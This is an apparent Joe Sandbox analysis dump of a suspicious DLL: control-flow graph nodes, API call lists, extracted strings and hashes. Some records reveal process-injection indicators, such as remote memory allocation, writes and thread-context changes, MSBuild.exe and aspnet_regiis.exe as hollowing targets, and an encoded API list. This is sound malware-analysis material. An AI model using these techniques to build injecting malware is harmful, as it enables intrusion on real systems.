12361 6d761936 12399 6d761967 12361->12399 12362 6d76192a 12363 6d762800 __freea 14 API calls 12362->12363 12365 6d761930 12363->12365 12367 6d762800 __freea 14 API calls 12368 6d76195a 12367->12368 12369 6d762800 __freea 14 API calls 12368->12369 12370 6d761960 12369->12370 12372 6d763966 12371->12372 12373 6d76191f 12371->12373 12421 6d762442 12372->12421 12377 6d763eb4 GetEnvironmentStringsW 12373->12377 12378 6d761924 12377->12378 12379 6d763ecc 12377->12379 12378->12361 12378->12362 12380 6d763e11 ___scrt_uninitialize_crt WideCharToMultiByte 12379->12380 12381 6d763ee9 12380->12381 12382 6d763ef3 FreeEnvironmentStringsW 12381->12382 12383 6d763efe 12381->12383 12382->12378 12384 6d7627b2 15 API calls 12383->12384 12385 6d763f05 12384->12385 12386 6d763f1e 12385->12386 12387 6d763f0d 12385->12387 12389 6d763e11 ___scrt_uninitialize_crt WideCharToMultiByte 12386->12389 12388 6d762800 __freea 14 API calls 12387->12388 12390 6d763f12 FreeEnvironmentStringsW 12388->12390 12391 6d763f2e 12389->12391 12392 6d763f4f 12390->12392 12393 6d763f35 12391->12393 12394 6d763f3d 12391->12394 12392->12378 12396 6d762800 __freea 14 API calls 12393->12396 12395 6d762800 __freea 14 API calls 12394->12395 12397 6d763f3b FreeEnvironmentStringsW 12395->12397 12396->12397 12397->12392 12400 6d76197c 12399->12400 12401 6d762936 __dosmaperr 14 API calls 12400->12401 12402 6d7619a3 12401->12402 12403 6d7619ab 12402->12403 12413 6d7619b5 12402->12413 12404 6d762800 __freea 14 API calls 12403->12404 12405 6d76193d 12404->12405 12405->12367 12406 6d761a12 12407 6d762800 __freea 14 API calls 12406->12407 12407->12405 12408 6d762936 __dosmaperr 14 API calls 12408->12413 12409 6d761a21 12777 6d761a49 12409->12777 12413->12406 12413->12408 12413->12409 12415 6d761a3c 12413->12415 12417 6d762800 __freea 14 API calls 12413->12417 12768 6d761e60 12413->12768 12414 6d762800 __freea 14 API calls 12416 6d761a2e 12414->12416 12783 6d760f95 IsProcessorFeaturePresent 12415->12783 12420 6d762800 __freea 
14 API calls 12416->12420 12417->12413 12419 6d761a48 12420->12405 12422 6d76244d 12421->12422 12427 6d762453 12421->12427 12424 6d76423c __dosmaperr 6 API calls 12422->12424 12423 6d76427b __dosmaperr 6 API calls 12426 6d76246d 12423->12426 12424->12427 12425 6d762459 12428 6d76245e 12425->12428 12469 6d761eba 12425->12469 12426->12425 12429 6d762936 __dosmaperr 14 API calls 12426->12429 12427->12423 12427->12425 12446 6d763768 12428->12446 12431 6d76247d 12429->12431 12433 6d762485 12431->12433 12434 6d76249a 12431->12434 12435 6d76427b __dosmaperr 6 API calls 12433->12435 12436 6d76427b __dosmaperr 6 API calls 12434->12436 12438 6d762491 12435->12438 12437 6d7624a6 12436->12437 12439 6d7624aa 12437->12439 12440 6d7624b9 12437->12440 12443 6d762800 __freea 14 API calls 12438->12443 12441 6d76427b __dosmaperr 6 API calls 12439->12441 12442 6d762189 __dosmaperr 14 API calls 12440->12442 12441->12438 12444 6d7624c4 12442->12444 12443->12425 12445 6d762800 __freea 14 API calls 12444->12445 12445->12428 12564 6d7638bd 12446->12564 12453 6d7637c4 12455 6d762800 __freea 14 API calls 12453->12455 12454 6d7637d2 12589 6d7639b8 12454->12589 12457 6d7637ab 12455->12457 12457->12373 12459 6d76380a 12460 6d762923 __dosmaperr 14 API calls 12459->12460 12462 6d76380f 12460->12462 12461 6d763851 12468 6d76389a 12461->12468 12600 6d7633e1 12461->12600 12464 6d762800 __freea 14 API calls 12462->12464 12463 6d763825 12463->12461 12465 6d762800 __freea 14 API calls 12463->12465 12464->12457 12465->12461 12467 6d762800 __freea 14 API calls 12467->12457 12468->12467 12480 6d764758 12469->12480 12473 6d761ef3 12516 6d7615e5 12473->12516 12474 6d761ed4 IsProcessorFeaturePresent 12477 6d761ee0 12474->12477 12476 6d761eca 12476->12473 12476->12474 12510 6d760d6c 12477->12510 12519 6d764686 12480->12519 12483 6d76479d 12484 6d7647a9 ___scrt_is_nonwritable_in_current_image 12483->12484 12485 6d7624d8 __dosmaperr 14 API calls 12484->12485 12486 6d7647f9 12484->12486 12487 6d76480b 
__InternalCxxFrameHandler 12484->12487 12492 6d7647da __InternalCxxFrameHandler 12484->12492 12485->12492 12488 6d762923 __dosmaperr 14 API calls 12486->12488 12489 6d764841 __InternalCxxFrameHandler 12487->12489 12530 6d762753 EnterCriticalSection 12487->12530 12490 6d7647fe 12488->12490 12494 6d76487e 12489->12494 12495 6d76497b 12489->12495 12506 6d7648ac 12489->12506 12493 6d760f68 ___std_exception_copy 39 API calls 12490->12493 12492->12486 12492->12487 12509 6d7647e3 12492->12509 12493->12509 12494->12506 12531 6d762387 GetLastError 12494->12531 12498 6d764986 12495->12498 12562 6d76279b LeaveCriticalSection 12495->12562 12500 6d7615e5 __InternalCxxFrameHandler 21 API calls 12498->12500 12502 6d76498e 12500->12502 12503 6d762387 _unexpected 39 API calls 12507 6d764901 12503->12507 12505 6d762387 _unexpected 39 API calls 12505->12506 12558 6d764927 12506->12558 12508 6d762387 _unexpected 39 API calls 12507->12508 12507->12509 12508->12509 12509->12476 12511 6d760d88 __InternalCxxFrameHandler std::bad_exception::bad_exception 12510->12511 12512 6d760db4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12511->12512 12515 6d760e85 __InternalCxxFrameHandler 12512->12515 12513 6d75c4d0 CatchGuardHandler 5 API calls 12514 6d760ea3 12513->12514 12514->12473 12515->12513 12517 6d761422 __InternalCxxFrameHandler 21 API calls 12516->12517 12518 6d7615f6 12517->12518 12520 6d764692 ___scrt_is_nonwritable_in_current_image 12519->12520 12525 6d762753 EnterCriticalSection 12520->12525 12522 6d7646a0 12526 6d7646e2 12522->12526 12525->12522 12529 6d76279b LeaveCriticalSection 12526->12529 12528 6d761ebf 12528->12476 12528->12483 12529->12528 12530->12489 12532 6d7623a3 12531->12532 12533 6d76239d 12531->12533 12534 6d76427b __dosmaperr 6 API calls 12532->12534 12537 6d7623a7 SetLastError 12532->12537 12535 6d76423c __dosmaperr 6 API calls 12533->12535 12536 6d7623bf 12534->12536 12535->12532 12536->12537 12539 6d762936 __dosmaperr 14 API calls 
12536->12539 12541 6d762437 12537->12541 12542 6d76243c 12537->12542 12540 6d7623d4 12539->12540 12543 6d7623dc 12540->12543 12544 6d7623ed 12540->12544 12541->12505 12545 6d761eba CallUnexpected 37 API calls 12542->12545 12546 6d76427b __dosmaperr 6 API calls 12543->12546 12547 6d76427b __dosmaperr 6 API calls 12544->12547 12548 6d762441 12545->12548 12549 6d7623ea 12546->12549 12550 6d7623f9 12547->12550 12553 6d762800 __freea 14 API calls 12549->12553 12551 6d762414 12550->12551 12552 6d7623fd 12550->12552 12554 6d762189 __dosmaperr 14 API calls 12551->12554 12555 6d76427b __dosmaperr 6 API calls 12552->12555 12553->12537 12556 6d76241f 12554->12556 12555->12549 12557 6d762800 __freea 14 API calls 12556->12557 12557->12537 12559 6d7648f3 12558->12559 12560 6d76492b 12558->12560 12559->12503 12559->12507 12559->12509 12563 6d76279b LeaveCriticalSection 12560->12563 12562->12498 12563->12559 12565 6d7638c9 ___scrt_is_nonwritable_in_current_image 12564->12565 12567 6d7638e3 12565->12567 12608 6d762753 EnterCriticalSection 12565->12608 12569 6d763792 12567->12569 12571 6d761eba CallUnexpected 39 API calls 12567->12571 12568 6d76391f 12609 6d76393c 12568->12609 12575 6d7634ef 12569->12575 12573 6d76395c 12571->12573 12572 6d7638f3 12572->12568 12574 6d762800 __freea 14 API calls 12572->12574 12574->12568 12613 6d762ff3 12575->12613 12578 6d763522 12580 6d763539 12578->12580 12581 6d763527 GetACP 12578->12581 12579 6d763510 GetOEMCP 12579->12580 12580->12457 12582 6d7627b2 12580->12582 12581->12580 12583 6d7627f0 12582->12583 12587 6d7627c0 __dosmaperr 12582->12587 12584 6d762923 __dosmaperr 14 API calls 12583->12584 12586 6d7627ee 12584->12586 12585 6d7627db HeapAlloc 12585->12586 12585->12587 12586->12453 12586->12454 12587->12583 12587->12585 12588 6d761085 __dosmaperr 2 API calls 12587->12588 12588->12587 12590 6d7634ef 41 API calls 12589->12590 12592 6d7639d8 12590->12592 12591 6d763add 12593 6d75c4d0 CatchGuardHandler 5 API calls 12591->12593 12592->12591 12594 
6d763a15 IsValidCodePage 12592->12594 12598 6d763a30 std::bad_exception::bad_exception 12592->12598 12595 6d7637ff 12593->12595 12594->12591 12596 6d763a27 12594->12596 12595->12459 12595->12463 12597 6d763a50 GetCPInfo 12596->12597 12596->12598 12597->12591 12597->12598 12656 6d7635c3 12598->12656 12601 6d7633ed ___scrt_is_nonwritable_in_current_image 12600->12601 12742 6d762753 EnterCriticalSection 12601->12742 12603 6d7633f7 12743 6d76342e 12603->12743 12608->12572 12612 6d76279b LeaveCriticalSection 12609->12612 12611 6d763943 12611->12567 12612->12611 12614 6d763011 12613->12614 12615 6d76300a 12613->12615 12614->12615 12616 6d762387 _unexpected 39 API calls 12614->12616 12615->12578 12615->12579 12617 6d763032 12616->12617 12621 6d764ddd 12617->12621 12622 6d763048 12621->12622 12623 6d764df0 12621->12623 12625 6d764e3b 12622->12625 12623->12622 12629 6d7652bc 12623->12629 12626 6d764e63 12625->12626 12627 6d764e4e 12625->12627 12626->12615 12627->12626 12651 6d7639a5 12627->12651 12630 6d7652c8 ___scrt_is_nonwritable_in_current_image 12629->12630 12631 6d762387 _unexpected 39 API calls 12630->12631 12632 6d7652d1 12631->12632 12634 6d765317 12632->12634 12642 6d762753 EnterCriticalSection 12632->12642 12634->12622 12635 6d7652ef 12643 6d76533d 12635->12643 12640 6d761eba CallUnexpected 39 API calls 12641 6d76533c 12640->12641 12642->12635 12644 6d76534b __dosmaperr 12643->12644 12646 6d765300 12643->12646 12645 6d765070 __dosmaperr 14 API calls 12644->12645 12644->12646 12645->12646 12647 6d76531c 12646->12647 12650 6d76279b LeaveCriticalSection 12647->12650 12649 6d765313 12649->12634 12649->12640 12650->12649 12652 6d762387 _unexpected 39 API calls 12651->12652 12653 6d7639aa 12652->12653 12654 6d7638bd ___scrt_uninitialize_crt 39 API calls 12653->12654 12655 6d7639b5 12654->12655 12655->12626 12657 6d7635eb GetCPInfo 12656->12657 12658 6d7636b4 12656->12658 12657->12658 12663 6d763603 12657->12663 12659 6d75c4d0 CatchGuardHandler 5 API calls 12658->12659 
12661 6d763766 12659->12661 12661->12591 12667 6d7655fd 12663->12667 12666 6d765fb3 43 API calls 12666->12658 12668 6d762ff3 39 API calls 12667->12668 12669 6d76561d 12668->12669 12687 6d763d57 12669->12687 12671 6d7656d9 12674 6d75c4d0 CatchGuardHandler 5 API calls 12671->12674 12672 6d7656d1 12690 6d7656fe 12672->12690 12673 6d76564a 12673->12671 12673->12672 12676 6d7627b2 15 API calls 12673->12676 12678 6d76566f __alloca_probe_16 std::bad_exception::bad_exception 12673->12678 12677 6d76366b 12674->12677 12676->12678 12682 6d765fb3 12677->12682 12678->12672 12679 6d763d57 ___scrt_uninitialize_crt MultiByteToWideChar 12678->12679 12680 6d7656b8 12679->12680 12680->12672 12681 6d7656bf GetStringTypeW 12680->12681 12681->12672 12683 6d762ff3 39 API calls 12682->12683 12684 6d765fc6 12683->12684 12696 6d765dc4 12684->12696 12694 6d763cbf 12687->12694 12691 6d76571b 12690->12691 12692 6d76570a 12690->12692 12691->12671 12692->12691 12693 6d762800 __freea 14 API calls 12692->12693 12693->12691 12695 6d763cd0 MultiByteToWideChar 12694->12695 12695->12673 12697 6d765ddf 12696->12697 12698 6d763d57 ___scrt_uninitialize_crt MultiByteToWideChar 12697->12698 12703 6d765e23 12698->12703 12699 6d765f9e 12700 6d75c4d0 CatchGuardHandler 5 API calls 12699->12700 12702 6d76368c 12700->12702 12701 6d765ef1 12705 6d7656fe __freea 14 API calls 12701->12705 12702->12666 12703->12699 12703->12701 12704 6d7627b2 15 API calls 12703->12704 12706 6d765e49 __alloca_probe_16 12703->12706 12704->12706 12705->12699 12706->12701 12707 6d763d57 ___scrt_uninitialize_crt MultiByteToWideChar 12706->12707 12708 6d765e92 12707->12708 12708->12701 12724 6d764308 12708->12724 12711 6d765f00 12713 6d765f89 12711->12713 12715 6d7627b2 15 API calls 12711->12715 12717 6d765f12 __alloca_probe_16 12711->12717 12712 6d765ec8 12712->12701 12714 6d764308 6 API calls 12712->12714 12716 6d7656fe __freea 14 API calls 12713->12716 12714->12701 12715->12717 12716->12701 12717->12713 12718 6d764308 6 API calls 
12717->12718 12719 6d765f55 12718->12719 12719->12713 12730 6d763e11 12719->12730 12721 6d765f6f 12721->12713 12722 6d765f78 12721->12722 12723 6d7656fe __freea 14 API calls 12722->12723 12723->12701 12733 6d763fdb 12724->12733 12728 6d764359 LCMapStringW 12729 6d764319 12728->12729 12729->12701 12729->12711 12729->12712 12732 6d763e24 ___scrt_uninitialize_crt 12730->12732 12731 6d763e62 WideCharToMultiByte 12731->12721 12732->12731 12734 6d7640da __dosmaperr 5 API calls 12733->12734 12735 6d763ff1 12734->12735 12735->12729 12736 6d764365 12735->12736 12739 6d763ff5 12736->12739 12738 6d764370 12738->12728 12740 6d7640da __dosmaperr 5 API calls 12739->12740 12741 6d76400b 12740->12741 12741->12738 12742->12603 12753 6d763bbd 12743->12753 12745 6d763450 12746 6d763bbd 39 API calls 12745->12746 12747 6d76346f 12746->12747 12748 6d762800 __freea 14 API calls 12747->12748 12749 6d763404 12747->12749 12748->12749 12750 6d763422 12749->12750 12767 6d76279b LeaveCriticalSection 12750->12767 12752 6d763410 12752->12468 12754 6d763bce 12753->12754 12757 6d763bca __InternalCxxFrameHandler 12753->12757 12755 6d763bd5 12754->12755 12759 6d763be8 std::bad_exception::bad_exception 12754->12759 12756 6d762923 __dosmaperr 14 API calls 12755->12756 12758 6d763bda 12756->12758 12757->12745 12760 6d760f68 ___std_exception_copy 39 API calls 12758->12760 12759->12757 12761 6d763c16 12759->12761 12762 6d763c1f 12759->12762 12760->12757 12763 6d762923 __dosmaperr 14 API calls 12761->12763 12762->12757 12764 6d762923 __dosmaperr 14 API calls 12762->12764 12765 6d763c1b 12763->12765 12764->12765 12766 6d760f68 ___std_exception_copy 39 API calls 12765->12766 12766->12757 12767->12752 12769 6d761e6e 12768->12769 12770 6d761e7c 12768->12770 12769->12770 12775 6d761e94 12769->12775 12771 6d762923 __dosmaperr 14 API calls 12770->12771 12772 6d761e84 12771->12772 12773 6d760f68 ___std_exception_copy 39 API calls 12772->12773 12774 6d761e8e 12773->12774 12774->12413 12775->12774 12776 6d762923 
__dosmaperr 14 API calls 12775->12776 12776->12772 12778 6d761a56 12777->12778 12782 6d761a27 12777->12782 12779 6d761a6d 12778->12779 12780 6d762800 __freea 14 API calls 12778->12780 12781 6d762800 __freea 14 API calls 12779->12781 12780->12778 12781->12782 12782->12414 12784 6d760fa1 12783->12784 12785 6d760d6c __InternalCxxFrameHandler 8 API calls 12784->12785 12786 6d760fb6 GetCurrentProcess TerminateProcess 12785->12786 12786->12419
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
• Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6d740000_file.jbxd
Yara matches
Similarity
• API ID: Process$AllocMemoryVirtual$Write$CloseCreateHandleWindow$ConsoleContextReadShowThreadWow64
• String ID: 44O$9{!O$@$Bey;$Bey;$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$Jh7$Jh7$QAAAAAAAAAAUmVhZFByb2Nlc3NNZW1vcnkAAAAAAAAAR2V0TGFzdEVycm9yAAAAAEszMkVudW1Qcm9jZXNzTW9kdWxlc0V4AEszMkdldE1vZHVsZUJhc2VOYW1lQQAAAEszMkdldE1vZHVsZUluZm9ybWF0aW9uAEdldFN5c3RlbUluZm8AAABWaXJ0dWFsUXVlcnlFeAAAQ3JlYXRlUHJvY2Vzc0EAAFNsZWVwAAAAR2V0TW9kdWxlRmlsZU5hbWVBA$\w$x$^wO?$kernel32.dll$ntdll.dll$n0s$n0s$B~$Eq$QA`$p,\$p,\
• API String ID: 320347283-3941945049
• Opcode ID: 7b463f2264291ba9a429967fe772fa6092636e75c100b6896e4ffa5070244375
• Instruction ID: 6d136c9e58ef4e43e75d146a6f06c3bf5bb9f32f085c0d14f174f97d299b20b3
• Opcode Fuzzy Hash: 7b463f2264291ba9a429967fe772fa6092636e75c100b6896e4ffa5070244375
• Instruction Fuzzy Hash: 61D30335A542118FCB16CE2CCA947E977F1BB47325F00C2AAD819DB394CA369E85CF52

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModule$Handle$CreateCurrentProcessProtectVirtual$CloseInformationMappingNameView
                                                                                                                            • String ID: @$H~$U
                                                                                                                            • API String ID: 16584625-714931626
                                                                                                                            • Opcode ID: a6a30edecc12db43422a1bd32e3f2d29467f2a49af797770c8948a9c84ecbf28
                                                                                                                            • Instruction ID: dba7d92219317d09c92bd4f5459169c3d7cfd0c698096f4b3ac078257f4c7cb9
                                                                                                                            • Opcode Fuzzy Hash: a6a30edecc12db43422a1bd32e3f2d29467f2a49af797770c8948a9c84ecbf28
                                                                                                                            • Instruction Fuzzy Hash: D2B2D075A542268FDF16CE3CCA943DAB7F1BB46320F01C2AAD45897354D7358A898F83

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID: NtQueryInformationProcess$ntdll.dll
                                                                                                                            • API String ID: 4139908857-2906145389
                                                                                                                            • Opcode ID: df04638742c7fc6e8605bbea52f0b1d374aaa7f07c68db413936957ec578f264
                                                                                                                            • Instruction ID: a39bcd8efbcae69af9d477fc09a4e9e5df5984be292c58072ec9b2622447e3b3
                                                                                                                            • Opcode Fuzzy Hash: df04638742c7fc6e8605bbea52f0b1d374aaa7f07c68db413936957ec578f264
                                                                                                                            • Instruction Fuzzy Hash: 62814771A592098FCF06CFBCC3947DEBBF1AB66320F14C52ED425AB254D735990A8B42

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • __RTC_Initialize.LIBCMT ref: 6D75C6E5
                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6D75C6FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2442719207-0
                                                                                                                            • Opcode ID: 9fc0d36777d76079caf6829add8cea26766f530796ee58aa6fda39578e2d7170
                                                                                                                            • Instruction ID: 1251aac7638961e716be135d22ec3659c0cb19bd3c4845c854b3d0313761a99a
                                                                                                                            • Opcode Fuzzy Hash: 9fc0d36777d76079caf6829add8cea26766f530796ee58aa6fda39578e2d7170
                                                                                                                            • Instruction Fuzzy Hash: 4441F972D08226AFDB118F59CA44B6E7B74EB4177AF11442BE92467240DF309D21CBD3

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3136044242-0
                                                                                                                            • Opcode ID: a75d858b28cab0e1ac2b92da534e8b38258d5e28f18693a694ef196d141bd728
                                                                                                                            • Instruction ID: 1b8b586be4c29b97ae06cfd788ca8b0ccb67ed32e1c2679243242cb41fd485d9
                                                                                                                            • Opcode Fuzzy Hash: a75d858b28cab0e1ac2b92da534e8b38258d5e28f18693a694ef196d141bd728
                                                                                                                            • Instruction Fuzzy Hash: 5321D871D04126AFCB118E59CA44B7F3B78DB416B6B01406AFD245B210DB309D21CBD3

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • __RTC_Initialize.LIBCMT ref: 6D75C5E4
                                                                                                                              • Part of subcall function 6D75CAB3: InitializeSListHead.KERNEL32(6D7D1CC0,6D75C5EE,6D76FD80,00000010,6D75C57F,?,?,?,6D75C7A7,?,00000001,?,?,00000001,?,6D76FDC8), ref: 6D75CAB8
                                                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D75C64E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3231365870-0
                                                                                                                            • Opcode ID: c0801f7bcd0e4f5b23627ec2ff9c7f37f435cd865807c5c3d5fbdac4f0c5689b
                                                                                                                            • Instruction ID: 614270cd32dbc9026429b5c84127f2f2dc8d8f95170dbfd7f74a3fdb1cec07b0
                                                                                                                            • Opcode Fuzzy Hash: c0801f7bcd0e4f5b23627ec2ff9c7f37f435cd865807c5c3d5fbdac4f0c5689b
                                                                                                                            • Instruction Fuzzy Hash: C821C33164C2869ADF04ABB897187AC77B0DB0233EF15206ADA55671C2DF2246B48767

                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 6D7644FD
                                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 6D76450F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1358094027.000000006D741000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D740000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1358053956.000000006D740000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358287281.000000006D76A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358313297.000000006D7D1000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000000.00000002.1358514374.000000006D7D3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_6d740000_file.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3000768030-0
                                                                                                                            • Opcode ID: 39eb7c6af4746dad88b5ae37441d568025d1415d3ff0594c1efcdd223fdf34a3
                                                                                                                            • Instruction ID: 6bd3d810b95341c023f62a6441242f367ba056dacb8d314cd38562fe1597b9a9
                                                                                                                            • Opcode Fuzzy Hash: 39eb7c6af4746dad88b5ae37441d568025d1415d3ff0594c1efcdd223fdf34a3
                                                                                                                            • Instruction Fuzzy Hash: D211B77150C7D346CB214D3D8DA6732BEA4A78B238B24472BE8B5865E2F730D446E263
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ".u$/%T$/%T$k|xW$qa;F
                                                                                                                            • API String ID: 0-2901583048
                                                                                                                            • Opcode ID: ca8aa2c0a32c1dbbaa3bd1324cbda7f5894b98db3e5b52b88c5700bfc56018d3
                                                                                                                            • Instruction ID: 656c35fadd35b675c8890dd3c34029198a773d8f5879517dedf6c33002177ebb
                                                                                                                            • Opcode Fuzzy Hash: ca8aa2c0a32c1dbbaa3bd1324cbda7f5894b98db3e5b52b88c5700bfc56018d3
                                                                                                                            • Instruction Fuzzy Hash: F242F332A751119FCF09CEBCDAD57DD77F2AB46360F14862AE815DB350CB2A89198B03
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D75CDDE
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6D75CEAA
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D75CEC3
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6D75CECD
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 254469556-0
                                                                                                                            • Opcode ID: a76125b71f653d39fc95006cf1a91607e8f5388c2d2c851e8cdae8fb0fe63c24
                                                                                                                            • Instruction ID: 138c4ad29d4d37ca52b193a04c66d9e25db3d4ed12ac647f5764238c1891933c
                                                                                                                            • Opcode Fuzzy Hash: a76125b71f653d39fc95006cf1a91607e8f5388c2d2c851e8cdae8fb0fe63c24
                                                                                                                            • Instruction Fuzzy Hash: 0C312975D05328DBDF20DFA4C949BCDBBB8AF08304F1041AAE50CAB240EB719A94CF46
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Kl$$M QA$M QA$MOZ4
                                                                                                                            • API String ID: 0-3174601671
